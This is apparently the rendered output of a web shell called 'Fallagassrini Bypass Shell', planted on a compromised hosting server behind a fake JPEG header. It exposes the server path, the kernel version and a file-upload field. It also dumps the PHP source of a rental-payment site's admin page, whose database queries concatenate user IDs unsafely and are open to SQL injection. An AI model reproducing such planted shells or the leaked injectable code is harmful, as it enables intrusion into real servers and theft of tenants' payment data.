JFIF;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 85 C  !"$"$C$^" }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ? C^",k8`98?þ. s$ֱ$Xw_Z¿2b978%Q}s\ŴqXxzK1\@N2<JY{lF/Z=N[xrB}FJۨ<yǽw 5o۹^s(!fF*zn5`Z}Ҋ">Ir{_+<$$C_UC)^r25d:(c⣕U .fpSnFe\Ӱ.չ8# m=8iO^)R=^*_:M3x8k>(yDNYҵ/v-]WZ}h[*'ym&e`Xg>%̲yk߆՞Kwwrd󞼎 r;M<[AC¤ozʪ+h%BJcd`*ǎVz%6}G;mcՊ~b_aaiiE4jPLU<Ɗvg?q~!vc DpA/m|=-nux^Hޔ|mt&^ 唉KH?񯣾 ^]G\4#r qRRGV!i~眦]Ay6O#gm&;UV BH ~Y8( J4{U| 14%v0?6#{t񦊊#+{E8v??c9R]^Q,h#i[Y'Š+xY佑VR{ec1%|]p=Vԡʺ9rOZY L(^*;O'ƑYxQdݵq~5_uk{yH$HZ(3 )~G Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home/jpewexports/public_html/application/views/admin/

Linux 43-225-53-84.webhostbox.net 3.10.0-1160.92.1.el7.x86_64 #1 SMP Tue Jun 20 11:48:01 UTC 2023 x86_64
Upload File :
Current File : /home/jpewexports/public_html/application/views/admin/edit_users.php

<?php
$p_title='users';
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
    <meta http-equiv="Content-Type" content="text/html;charset=UTF-8" />
    <title>users </title>
    <link rel="stylesheet" href="<?php echo base_url(); ?>css/admin/style.css" media="all" type="text/css" />
    <link rel="stylesheet" href="<?php echo base_url(); ?>lib/jquery-ui/css/smoothness/jquery-ui-1.8.15.custom.css" type="text/css" /><link rel="stylesheet" href="<?php echo base_url(); ?>lib/datatables/css/table_jui.css" type="text/css" />
    <link rel="stylesheet" href="<?php echo base_url(); ?>lib/harvesthq-chosen/chosen.css" type="text/css" />
    <link rel="stylesheet" href="<?php echo base_url(); ?>lib/elfinder/css/elfinder.full.css" type="text/css" />
    <link rel="stylesheet" href="<?php echo base_url(); ?>lib/fancybox/jquery.fancybox-1.3.4.css" type="text/css" />
    <link rel="stylesheet" href="<?php echo base_url(); ?>lib/file-uploader/fileuploader.css" type="text/css" />
    <link rel="stylesheet" href="http://fonts.googleapis.com/css?family=Open+Sans" type="text/css" />

    <script type="text/javascript" src="<?php echo base_url(); ?>js/admin/head.load.min.js"></script>
         <script type="text/javascript" src="<?php echo base_url(); ?>ckeditor/ckeditor.js"></script>

<script>


function form_validate()
{
    
	var title =  document.register_form.title.value;
   var detail=document.register_form.detail.value;
  
	if(title=='')
	{
	     document.getElementById("error_title").innerHTML ="* Add Headline";
	    
		    return false;
	}
	
	   document.getElementById("error_title").innerHTML ="";
	if(detail=='')
	{
	     document.getElementById("error_detail").innerHTML ="* Add News";
	    
		    return false;
	}
	
	
	document.getElementById("error_detail").innerHTML ="";
	
	

	document.register_form.action="<?php echo base_url(); ?>admin/edit_users/update/<?php echo $id; ?>";
	document.register_form.submit();
		
}
</script>


<script type="text/javascript" language="javascript">
function close_alert()
{
   document.getElementById("ok").style.display="none";
}
</script>

</head>

<body class="bg_c sidebar fluid">
<div id="slide_wrapper">
        <div id="slide_panel" class="wrapper">
            <div id="slide_content">
                <span id="slide_close"><img src="<?php echo base_url();?>images/blank.gif" alt="" class="round_x16_b" /></span>

				<div class="cf">
					<div class="dp100 sortable"><p class="s_color tac sepH_a">You can drag widgets from dashboard and drop it here.</p></div>
				</div>

				<div class="row cf">
					<div class="dp75 taj">
                        <h4 class="sepH_b">Lorem ipsum dolor sit amet...</h4>
                        Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nam enim diam, vulputate vitae pharetra vel, pretium dictum ligula. In mauris eros, aliquam sit amet ullamcorper id, dictum eget ipsum. Nulla non porta arcu. Pellentesque faucibus, erat id interdum accumsan, neque magna ultrices ante, at laoreet lorem sem sit amet risus. Proin quis turpis ac nulla faucibus luctus at ac nisl. Suspendisse adipiscing turpis non risus tempus sit amet rhoncus est luctus. Cras in accumsan nulla. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nam enim diam, vulputate vitae pharetra vel, pretium dictum ligula. In mauris eros, aliquam sit amet ullamcorper id, dictum eget ipsum. Nulla non porta arcu. Pellentesque faucibus, erat id interdum accumsan, neque magna ultrices ante, at laoreet lorem sem sit amet risus. Proin quis turpis ac nulla faucibus luctus at ac nisl. Suspendisse adipiscing turpis non risus tempus sit amet rhoncus est luctus. Cras in accumsan nulla.
                    </div>
					<div class="dp25">
                        <div id="chart_k"></div>
                    </div>
				</div>
            </div>
        </div>
    </div>
    <?php
	include('header.php');
	
	?>
    
    
<input type="hidden" value="<?php echo base_url(); ?>" id="url_val" />
<div  id="error" class="msg_box msg_error" style="display:none;"><img src="<?php echo base_url();?>images/blank.gif" class="msg_close" alt="" /></div>
<!----------------------------------------------edit main category popup--------------------------------------------------------------------->
               
                    
                    
	<div id="main">
		<div class="wrapper">
			<div id="main_section" class="cf brdrrad_a" style="width:98%;">

				<div id="content_wrapper">
					<div id="main_content" class="cf" style="margin-left:15px;">
<?php

							$comi=$this->db->query("select * from admin");
		$comi1=$comi->row_array();
		$comi2=$comi->num_rows();
		if($comi2!=0)
		{
			if(isset($comi1['comission'])) { $comi1['comission']=$comi1['comission']; } else { $comi1['comission']='';}
		} else { $comi1['comission']='';}
			
			
$set1=$this->db->query("select * from tbl_users where id='".$id."'");
$row1=$set1->row_array();
?>
					<!--	<form action="" method="post" class="formEl" id="form_static"  onsubmit="return form_validate()" name="register_form" enctype="multipart/form-data">
							<!--<div class="cf sepH_c">
								<div id="content_actions" class="fr">
									<button class="btn btn_d" type="submit" name="update" >Save</button>
                             
								</div>
								
							</div>-

							

							<div class="msg_box msg_error" id="form_a_errors" style="display:none"></div>

							<div class="content_panes">

								<div id="tab-1">

									<div class="formEl_a">

										<fieldset>
											<legend>You can edit users Here...</legend>
											
                                            
                                            <div class="sepH_c cf" id="title">
												<label for="text" class="lbl_a">users Code: </label>
                                                
                                         <textarea name="title" id="title" style="height:20px;"><?php echo $row1['users_code']; ?></textarea>
				<div id="error_title" style="color:#FF0000;"></div>
											</div>
                                              
                                                                                      
                                           
                                            <div class="sepH_c cf" id="title">
												<label for="text" class="lbl_a">users Type: </label>
                                                
                                         <select name="detail" id="detail" >
										 <option value="1" <?php if($row1['users_type']==1){ echo "selected"; } else {} ?>>0-2500</option>
										 <option value="2" <?php if($row1['users_type']==2){ echo "selected"; } else {} ?>>2500-7500</option>
										 </select>
				                       <div id="error_detail" style="color:#FF0000;"></div>
											</div>
                                            
                    
                                          
                                            
										</fieldset>

									</div>


								</div>

								

							</div>
						</form>-->
					</div>
				</div>
				
			
      <!----------------------------------------------End of Form---------------------------------------------------------------->
                <div id="content_wrapper" style="width:110%; margin-left:-219px; margin-top:50px;">
					<div id="main_content" class="cf">

						
        <!---------------------------------------Start of First Table------------------------------------------------------------>
       <?php if($row1['user_type']=='2')  { ?>
						<table class="display" id="content_table">
                        
							<thead>
								<tr>
									<th><div class="th_wrapp">Series</div></th>
									<th><div class="th_wrapp">Property</div></th>
                                    <th><div class="th_wrapp">Due Date</div></th>
                                    <th><div class="th_wrapp">Maintenance Cost</div></th>
                                    <th><div class="th_wrapp">Rent</div></th>
                                    <th><div class="th_wrapp">Total</div></th>
                                    <th><div class="th_wrapp">Payment Status</div></th>
                                   

                                                                                                      
								</tr>
							</thead>
							<tbody>
								<?php

								$ts='1';
$udata=$this->db->query("select * from property_maintenance where tenant='".$row1['email']."'");

$ud1=$udata->num_rows();

if($ud1!=0)
{	
$ud4=$udata->result_array();
foreach($ud4 as $ud2)
{								

$pty=$this->db->query("select * from user_properties where property_id='".$ud2['property']."'");
$pt1=$pty->num_rows();
if($pt1!=0)
{
	$pt2=$pty->row_array();
	if(isset($pt2['price'])){ $pt2['price']=$pt2['price']; } else { $pt2['price']=''; }
} else { $pt2['price']=''; }
								
								?>
								<tr>
									<td><?php echo $ts; ?></td>
									<td><?php echo $ud2['property']; ?></td>
                                    <td ><?php echo $ud2['due_date']; ?></td>
                                    <td ><?php echo $ud2['cost']; ?></td>
                                    <td ><?php  echo $pt2['price']; ?></td>
                                    <td ><?php  echo $pt2['price']+$ud2['cost']; ?></td>
                                    <td ><?php if($ud2['payment_status']=='1') { echo "Paid"; } else { echo "Pending"; }  ?></td>
                                                               
                                    
                                    
                                                              
								</tr>
								
<?php $ts++; } } ?>								
							</tbody>
						</table>
	   <?php } else  ?>
	   <?php if($row1['user_type']=='1')  { ?>
						<table class="display" id="content_table">
                        
							<thead>
								<tr>
									<th><div class="th_wrapp">Series</div></th>
									<th><div class="th_wrapp">Property</div></th>
									<th><div class="th_wrapp">Tenant</div></th>
									<th><div class="th_wrapp">Due Date</div></th>
									<th><div class="th_wrapp">Paid On</div></th>
                                    <th><div class="th_wrapp">Rent</div></th>
                                    <th><div class="th_wrapp">Bonus</div></th>
                                    <th><div class="th_wrapp">Total</div></th>
                                    <th><div class="th_wrapp">Payment Status</div></th>
                                    <th><div class="th_wrapp">Withdrawl</div></th>
                                   

                                                                                                      
								</tr>
							</thead>
							<tbody>
								<?php


								$ts='1';
$udata=$this->db->query("select * from payment_record where landlord='$id' and manager=''");

$ud1=$udata->num_rows();

if($ud1!=0)
{	
$ud4=$udata->result_array();
foreach($ud4 as $ud2)
{								

												$ttl3='';
				$trsy=100+$comi1['comission'];
			$ttl3=($ud2['amount']*100)/$trsy;
			$ttl2=$ttl3;
								?>
								<tr>
									<td><?php echo $ts; ?></td>
									<td><?php echo $ud2['property_id']; ?></td>
									<td><?php echo $ud2['paid_by']; ?></td>
									<td><?php echo $ud2['due_date']; ?></td>
									<td><?php echo $ud2['paid_on']; ?></td>
                                    <td ><?php echo $ttl2; ?></td>
                                    <td ><?php echo $ud2['bonus']; ?></td>
                                    <td ><?php  echo $ttl2+$ud2['bonus']; ?></td>
                                    <td ><?php if($ud2['status']=='1') { echo "Paid"; } else { echo "Pending"; }  ?></td>
                                    <td ><?php if($ud2['checkout']=='1') { echo "Done"; } else { echo "Pending"; }  ?></td>
                                                               
                                    
                                    
                                                              
								</tr>
								
<?php $ts++; } } ?>								
							</tbody>
						</table>
	   <?php } else  { ?>
						<table class="display" id="content_table">
                        
							<thead>
								<tr>
									<th><div class="th_wrapp">Series</div></th>
									<th><div class="th_wrapp">Property</div></th>
									<th><div class="th_wrapp">Tenant</div></th>
									<th><div class="th_wrapp">Due Date</div></th>
									<th><div class="th_wrapp">Paid On</div></th>
                                    <th><div class="th_wrapp">Rent</div></th>
                                    <th><div class="th_wrapp">Total</div></th>
                                    <th><div class="th_wrapp">Payment Status</div></th>
                                    <th><div class="th_wrapp">Withdrawl</div></th>
                                   

                                                                                                      
								</tr>
							</thead>
							<tbody>
								<?php


								$ts='1';
$udata=$this->db->query("select * from payment_record where manager='$id'");

$ud1=$udata->num_rows();

if($ud1!=0)
{	
$ud4=$udata->result_array();
foreach($ud4 as $ud2)
{								

																	$ttl32='';
				$trsy=100+$comi1['comission'];
			$ttl3=($ud2['amount']*100)/$trsy;
			$ttl2=$ttl3;	
								?>
								<tr>
									<td><?php echo $ts; ?></td>
									<td><?php echo $ud2['property_id']; ?></td>
									<td><?php echo $ud2['paid_by']; ?></td>
									<td><?php echo $ud2['due_date']; ?></td>
									<td><?php echo $ud2['paid_on']; ?></td>
                                    <td ><?php echo $ttl3; ?></td>
                                    <td ><?php  echo $ttl3; ?></td>
                                    <td ><?php if($ud2['status']=='1') { echo "Paid"; } else { echo "Pending"; }  ?></td>
                                    <td ><?php if($ud2['checkout']=='1') { echo "Done"; } else { echo "Pending"; }  ?></td>
                                                               
                                    
                                    
                                                              
								</tr>
								
<?php $ts++; } } ?>								
							</tbody>
						</table>
	   <?php } ?>
					</div>
				</div>
                
                

			</div>
		</div>
	</div>

<script type="text/javascript">
		head.js(
			"<?php echo base_url(); ?>js/admin/jquery-1.6.2.min.js",
			"<?php echo base_url(); ?>lib/datatables/jquery.dataTables.min.js",
			"<?php echo base_url(); ?>lib/datatables/dataTables.plugins.js",
			"<?php echo base_url(); ?>lib/fusion-charts/FusionCharts.js",
			
			"<?php echo base_url(); ?>js/admin/jquery.microaccordion.js",
			"<?php echo base_url(); ?>js/admin/jquery.tools.min.js",
			"<?php echo base_url(); ?>js/admin/jquery.stickyPanel.js",
			"<?php echo base_url(); ?>js/admin/jquery.text-overflow.min.js",
			"<?php echo base_url(); ?>js/admin/xbreadcrumbs.js",
			"<?php echo base_url(); ?>js/admin/jquery.stickyPanel.js",
			"<?php echo base_url(); ?>js/admin/lagu.js",
			"<?php echo base_url(); ?>lib/fancybox/jquery.fancybox-1.3.4.pack.js",
			function(){
				lga_dataTables.lga_contentTable();
				lga_fusionCharts.chart_k();
				
				/*
				{
				   "bSort": false,
					"aLengthMenu": [
						[10, 15],
						[10, 15]
					],
				  "iDisplayLength":10
				}
				*/
				
				$('#content_table4').dataTable();
				$('#content_table5').dataTable();
				
				$("#fancy_login_form").fancybox({
				
					'transitionIn'	: 'fade',
					'scrolling'		: 'no',
					'titleShow'		: false,
					'overlayOpacity'	: '0',
					'hideOnOverlayClick': false,
					'onClosed'		: function() {
						$("#login_error").hide();
					}
				});
				//simple validation
				$("#login_form").bind("submit", function() {
				
					if ($("#login_name").val().length < 1 || $("#login_pass").val().length < 1) {
						$("#login_error").show();
						$.fancybox.resize();
						return false;
					}
					$.fancybox.showActivity();
					$.ajax({
						type	: "POST",
						cache	: false,
						url		: "helper_serialize.php",
						data	: $(this).serializeArray(),
						success: function(data) {
							$.fancybox(data,{
								'overlayOpacity'	: '0',
								'hideOnOverlayClick': false
							});
						}
					});
					return false;
				});
				
				
			}
			
			
			
		)
    </script>

<script type='text/javascript' language="javascript">
function check_fn()
{

    var detail=document.getElementById("detail").value;
	var length=detail.length;
	if(length>148)
	{
	     alert("You can add maximum 150 characters");
	      return false;
	}	
}
</script>
</body>
</html>

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net